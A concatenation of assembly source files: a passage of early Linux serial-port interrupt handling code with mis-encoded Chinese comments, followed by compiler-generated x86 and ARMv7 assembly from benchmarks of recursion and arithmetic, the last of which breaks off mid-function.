and must match the value tty_io.c еֵƥ!
in tty_io.c!!! */
/* these are the offsets into the read/write buffer structures */
/* ЩǶдṹеƫ */
// Ӧinclude/linux/tty.h ļtty_queue ṹиƫ
rs_addr = 0 // ж˿ںֶƫƣ˿ں0x3f8 0x2f8
head = 4 // ͷֶָƫơ
tail = 8 // βֶָƫơ
proc_list = 12 // ȴûĽֶƫơ
buf = 16 // ֶƫơ
startup = 256 /* chars left in write queue when we restart it */
/* дﻹʣ256 ַռ(WAKEUP_CHARS)ʱǾͿд */
/*
* These are the actual interrupt routines. They look where
* the interrupt is coming from, and take appropriate action.
*/
/*
* ЩʵʵжϳȼжϵԴȻִӦ
* Ĵ
*/
.align 2
//// ж˿1 жϴڵ㡣
_rs1_interrupt:
pushl $_table_list+8 // tty жӦ1 Ķдָĵַջ(tty_io.c99)
jmp rs_int
.align 2
//// ж˿2 жϴڵ㡣
_rs2_interrupt:
pushl $_table_list+16 // tty жӦ2 Ķдָĵַջ
rs_int:
pushl %edx
pushl %ecx
pushl %ebx
pushl %eax
push %es
push %ds /* as this is an interrupt, we cannot */
pushl $0x10 /* know that bs is ok. Load it */
pop %ds /* һжϳDz֪ds Ƿȷ*/
pushl $0x10 /* Լ(dses ָںݶ */
pop %es
movl 24(%esp),%edx // ַָedx Ĵ
// Ҳ35 39 ѹջĵַ
movl (%edx),%edx // ȡָ(ַ)??edx
movl rs_addr(%edx),%edx // ȡ1 Ķ˿ں??edx
addl $2,%edx /* interrupt ident. reg */ /* edx ָжϱʶĴ */
rep_int: // жϱʶĴ˿0x3fa0x2faμϽбϢ
xorl %eax,%eax // eax 㡣
inb %dx,%al // ȡжϱʶֽڣжжԴ(4 ж)
testb $1,%al // жж(λ0=1 жϣ=0 ж)
jne end // жϣת˳end
cmpb $6,%al /* this shouldn't happen, but ... */ /* ⲻᷢǡ*/
ja end // al ֵ>6? תendû״̬
movl 24(%esp),%ecx // ȡַָ??ecx
pushl %edx // ˿ں0x3fa(0x2fa)ջ
subl $2,%edx // 0x3f8(0x2f8)
call jmp_table(,%eax,2) /* NOTE! not *4, bit0 is 0 already */ /* 4λ0 0*/
// ָджʱal λ0=0λ2-1 жͣ൱Ѿж
// 2ٳ2õתӦж͵ַתȥӦ
popl %edx // жϱʶĴ˿ں0x3fa0x2fa
jmp rep_int // תжжϲ
end: movb $0x20,%al // жϿͽжָEOI
outb %al,$0x20 /* EOI */
pop %ds
pop %es
popl %eax
popl %ebx
popl %ecx
popl %edx
addl $4,%esp # jump over _table_list entry # ַָ
iret
// жʹַת4 жԴ
// modem ״̬仯жϣдַжϣַжϣ·״̬жϡ
jmp_table:
.long modem_status,write_char,read_char,line_status
.align 2
modem_status:
addl $6,%edx /* clear intr by reading modem status reg */
inb %dx,%al /* ͨmodem ״̬Ĵиλ(0x3fe) */
ret
.align 2
line_status:
addl $5,%edx /* clear intr by reading line status reg. */
inb %dx,%al /* ͨ·״̬Ĵиλ(0x3fd) */
ret
.align 2
read_char:
inb %dx,%al /* ȡַ??al
movl %ecx,%edx /* ǰڻַָ??edx
subl $_table_list,%edx // ַָ - ǰڶַָ??edx
shrl $3,%edx // ֵ/8ڴ1 1ڴ2 2
movl (%ecx),%ecx # read-queue # ȡнṹַ??ecx
movl head(%ecx),%ebx // ȡлͷָ??ebx
movb %al,buf(%ecx,%ebx) // ַڻͷָָλá
incl %ebx // ͷָǰһֽڡ
andl $size-1,%ebx // ûСͷָģָ벻ܳС
cmpl tail(%ecx),%ebx // ͷָβָȽϡ
je 1f // ȣʾת1
movl %ebx,head(%ecx) // Ĺͷָ롣
1: pushl %edx // ںѹջ(1- 12 - 2)Ϊ
call _do_tty_interrupt // tty жϴC
addl $4,%esp // ջء
ret
.align 2
write_char:
movl 4(%ecx),%ecx # write-queue # ȡднṹַ??ecx
movl head(%ecx),%ebx // ȡдͷָ??ebx
subl tail(%ecx),%ebx // ͷָ - βָ = ַ
andl $size-1,%ebx # nr chars in queue # ָȡģ㡣
je write_buffer_empty // ͷָ = βָ룬˵дַת
cmpl $startup,%ebx // ַ256
ja 1f // ת
movl proc_list(%ecx),%ebx # wake up sleeping process # ѵȴĽ̡
// ȡȴöеĽ̵ָ룬жǷΪա
testl %ebx,%ebx # is there any? # еȴĽ
je 1f // ǿյģǰת1
movl $0,(%ebx) // Ϊ״̬(ѽ)
1: movl tail(%ecx),%ebx // ȡβָ롣
movb buf(%ecx,%ebx),%al // ӻβָ봦ȡһַ??al
outb %al,%dx // ˿0x3f8(0x2f8)ͳּĴС
incl %ebx // βָǰơ
andl $size-1,%ebx // βָĩˣۻء
movl %ebx,tail(%ecx) // Ĺβָ롣
cmpl head(%ecx),%ebx // βָͷָȽϣ
je write_buffer_empty // ȣʾѿգת
ret
.align 2
write_buffer_empty:
movl proc_list(%ecx),%ebx # wake up sleeping process # ѵȴĽ̡
// ȡȴöеĽ̵ָ룬жǷΪա
testl %ebx,%ebx # is there any? # еȴĽ
je 1f # ޣǰת1
movl $0,(%ebx) # Ϊ״̬(ѽ)
1: incl %edx # ָ˿0x3f9(0x2f9)
inb %dx,%al # ȡжĴ
jmp 1f # ӳ١
1: jmp 1f
1: andb $0xd,%al /* disable transmit interrupt */
/* ηͱּĴжϣλ1 */
outb %al,%dx // д0x3f9(0x2f9)
ret
|
akalenuk/wordsandbuttons
| 1,475
|
exp/recursion_optimization/no_tco.s
|
.file "no_tco.cpp"
.section .text.unlikely,"ax",@progbits
.LCOLDB0:
.text
.LHOTB0:
.p2align 4,,15
.globl _Z12sum_of_firsti
.type _Z12sum_of_firsti, @function
_Z12sum_of_firsti:
.LFB0:
.cfi_startproc
testl %edi, %edi
jne .L4
xorl %eax, %eax
ret
.p2align 4,,10
.p2align 3
.L4:
jmp _Z12sum_of_firsti.part.0
.cfi_endproc
.LFE0:
.size _Z12sum_of_firsti, .-_Z12sum_of_firsti
.section .text.unlikely
.LCOLDE0:
.text
.LHOTE0:
.section .text.unlikely
.LCOLDB1:
.text
.LHOTB1:
.p2align 4,,15
.type _Z12sum_of_firsti.part.0, @function
_Z12sum_of_firsti.part.0:
.LFB2:
.cfi_startproc
pushq %rbx
.cfi_def_cfa_offset 16
.cfi_offset 3, -16
movl %edi, %ebx
leal -1(%rdi), %edi
call _Z12sum_of_firsti
movl $1, %edx
addl %ebx, %eax
cmpl $1, %ebx
cmove %edx, %eax
popq %rbx
.cfi_def_cfa_offset 8
ret
.cfi_endproc
.LFE2:
.size _Z12sum_of_firsti.part.0, .-_Z12sum_of_firsti.part.0
.section .text.unlikely
.LCOLDE1:
.text
.LHOTE1:
.section .text.unlikely
.LCOLDB2:
.section .text.startup,"ax",@progbits
.LHOTB2:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB1:
.cfi_startproc
subq $8, %rsp
.cfi_def_cfa_offset 16
movl $65535, %edi
call _Z12sum_of_firsti.part.0
addq $8, %rsp
.cfi_def_cfa_offset 8
addl $65536, %eax
ret
.cfi_endproc
.LFE1:
.size main, .-main
.section .text.unlikely
.LCOLDE2:
.section .text.startup
.LHOTE2:
.ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 2,039
|
exp/recursion_optimization/no_tco_instances_trick_4.s
|
.file "no_tco_instances_trick_4.cpp"
.section .text.unlikely,"ax",@progbits
.LCOLDB0:
.text
.LHOTB0:
.p2align 4,,15
.type _Z12sum_of_firstILi0ELi4EEii.part.2, @function
_Z12sum_of_firstILi0ELi4EEii.part.2:
.LFB8:
.cfi_startproc
pushq %r13
.cfi_def_cfa_offset 16
.cfi_offset 13, -16
pushq %r12
.cfi_def_cfa_offset 24
.cfi_offset 12, -24
pushq %rbp
.cfi_def_cfa_offset 32
.cfi_offset 6, -32
pushq %rbx
.cfi_def_cfa_offset 40
.cfi_offset 3, -40
movl %edi, %ebx
movl %edi, %ebp
subq $8, %rsp
.cfi_def_cfa_offset 48
subl $1, %ebx
jne .L28
.L2:
addl %ebp, %ebx
movl $1, %eax
cmpl $1, %ebp
cmovne %ebx, %eax
addq $8, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 40
popq %rbx
.cfi_def_cfa_offset 32
popq %rbp
.cfi_def_cfa_offset 24
popq %r12
.cfi_def_cfa_offset 16
popq %r13
.cfi_def_cfa_offset 8
ret
.p2align 4,,10
.p2align 3
.L28:
.cfi_restore_state
movl %edi, %r12d
subl $2, %r12d
jne .L29
.L3:
addl %ebx, %r12d
cmpl $1, %ebx
cmovne %r12d, %ebx
jmp .L2
.p2align 4,,10
.p2align 3
.L29:
movl %edi, %r13d
subl $3, %r13d
jne .L30
.L4:
addl %r12d, %r13d
cmpl $1, %r12d
cmovne %r13d, %r12d
jmp .L3
.p2align 4,,10
.p2align 3
.L30:
movl %edi, %eax
subl $4, %eax
je .L5
movl %eax, %edi
call _Z12sum_of_firstILi0ELi4EEii.part.2
.L5:
addl %r13d, %eax
cmpl $1, %r13d
cmovne %eax, %r13d
jmp .L4
.cfi_endproc
.LFE8:
.size _Z12sum_of_firstILi0ELi4EEii.part.2, .-_Z12sum_of_firstILi0ELi4EEii.part.2
.section .text.unlikely
.LCOLDE0:
.text
.LHOTE0:
.section .text.unlikely
.LCOLDB1:
.section .text.startup,"ax",@progbits
.LHOTB1:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB1:
.cfi_startproc
subq $8, %rsp
.cfi_def_cfa_offset 16
movl $65532, %edi
call _Z12sum_of_firstILi0ELi4EEii.part.2
addq $8, %rsp
.cfi_def_cfa_offset 8
addl $262138, %eax
ret
.cfi_endproc
.LFE1:
.size main, .-main
.section .text.unlikely
.LCOLDE1:
.section .text.startup
.LHOTE1:
.ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 14,585
|
exp/cpp_and_and/ARMv7/s/minus_abs_plus.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "minus_abs_plus.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
mov r1, r4
ldr r2, [r1, r5]!
add r5, r5, #4
ldmib r1, {r3, r7}
rsb r6, r2, #1
cmp r2, #0
subgt r6, r2, #1
rsb r2, r3, #1
cmp r3, #0
ldr r1, [r1, #12]
subgt r2, r3, #1
rsb r3, r7, #1
cmp r7, #0
add r2, r2, r6
subgt r3, r7, #1
cmp r1, #0
add r2, r2, r3
rsb r3, r1, #1
subgt r3, r1, #1
cmn r2, r3
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
cmp r5, r0
bne .LBB0_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#8:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit8
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_14
@ BB#13:
mov r0, r4
bl _ZdlPv
.LBB0_14: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_15:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_17:
.Ltmp2:
mov r5, r0
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit10
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_minus_abs_plus.cpp,%function
_GLOBAL__sub_I_minus_abs_plus.cpp: @ @_GLOBAL__sub_I_minus_abs_plus.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_minus_abs_plus.cpp, .Ltmp17-_GLOBAL__sub_I_minus_abs_plus.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_minus_abs_plus.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,987
|
exp/cpp_and_and/ARMv7/s/minus_mul_double_plus.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "minus_mul_plus_double.cpp"
.globl _Z2sqd
.align 2
.type _Z2sqd,%function
_Z2sqd: @ @_Z2sqd
.fnstart
.Leh_func_begin0:
@ BB#0:
vmul.f64 d0, d0, d0
bx lr
.Ltmp0:
.size _Z2sqd, .Ltmp0-_Z2sqd
.cantunwind
.fnend
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB1_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB1_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp1:
movw r8, #8192
movt r8, #1953
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp2:
@ BB#3: @ %.lr.ph
